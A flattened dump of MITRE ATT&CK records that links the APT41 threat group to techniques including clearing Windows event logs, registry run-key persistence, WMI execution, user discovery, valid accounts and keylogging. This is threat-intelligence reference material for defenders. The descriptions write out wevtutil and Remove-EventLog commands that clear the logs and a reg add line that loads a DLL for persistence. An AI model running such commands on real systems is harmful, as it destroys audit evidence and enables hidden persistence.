description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by clearing Windows security and system events.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--4cbd1250-5e79-46c0-b38f-83bd5942f44c
revoked : False
technique : Clear Windows Event Logs
technique_description : Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

The event logs can be cleared with the following utility commands:

* <code>wevtutil cl system</code>
* <code>wevtutil cl application</code>
* <code>wevtutil cl security</code>

These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command <code>Remove-EventLog -LogName Security</code> to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1070.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Command: Command Execution', 'File: File Deletion', 'Process: OS API Execution', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) created and modified startup files for persistence.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) [APT41](https://attack.mitre.org/groups/G0096) added a registry key in <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost</code> to establish persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--6ad8e998-041f-491d-8691-4990022248e0
revoked : False
technique : Registry Run Keys / Startup Folder
technique_description : Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.

The following run keys are created by default on Windows systems:

* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>.

The following Registry keys can be used to set startup folder items for persistence:

* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot:

* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run automatically for the currently logged-on user.

By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1547.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Command: Command Execution', 'File: File Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Creation', 'Windows Registry: Windows Registry Key Modification']
permissions_required : ['Administrator', 'User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the WMIEXEC utility to execute <code>whoami</code> commands on remote machines.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--ae12b657-a640-40c6-99b7-931ed10705de
revoked : False
technique : System Owner/User Discovery
technique_description : Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1033
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Active Directory: Active Directory Object Access', 'Process: OS API Execution', 'Command: Command Execution', 'Network Traffic: Network Traffic Content', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Windows Registry: Windows Registry Key Access', 'File: File Access', 'Process: Process Access']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via [PowerSploit](https://attack.mitre.org/software/S0194).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--f395cb28-5bc0-487e-b679-155ac785b7d9
revoked : False
technique : Windows Management Instrumentation
technique_description : Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1047
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Network Traffic: Network Connection Creation', 'Process: Process Creation', 'WMI: WMI Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used compromised credentials to log on to other systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--0528b64e-e719-44a9-94aa-0576bd9a87ec
revoked : False
technique : Valid Accounts
technique_description : Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)

The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1078
matrix : mitre-attack
platform : ['Windows', 'Azure AD', 'Office 365', 'SaaS', 'IaaS', 'Linux', 'macOS', 'Google Workspace', 'Containers', 'Network']
data_sources : ['Logon Session: Logon Session Creation', 'User Account: User Account Authentication', 'Logon Session: Logon Session Metadata']
permissions_required : ['User', 'Administrator']
effective_permissions : ['User', 'Administrator']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a keylogger called GEARSHIFT on a target system.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--f480c10c-6a40-4fc7-9380-c2690c70a599
revoked : False
technique : Keylogging
technique_description : Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)

Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:

* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1056.001
matrix : mitre-attack
platform : ['Windows', 'macOS', 'Linux', 'Network']
data_sources : ['Driver: Driver Load', 'Process: OS API Execution', 'Windows Registry: Windows Registry Key Modification']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
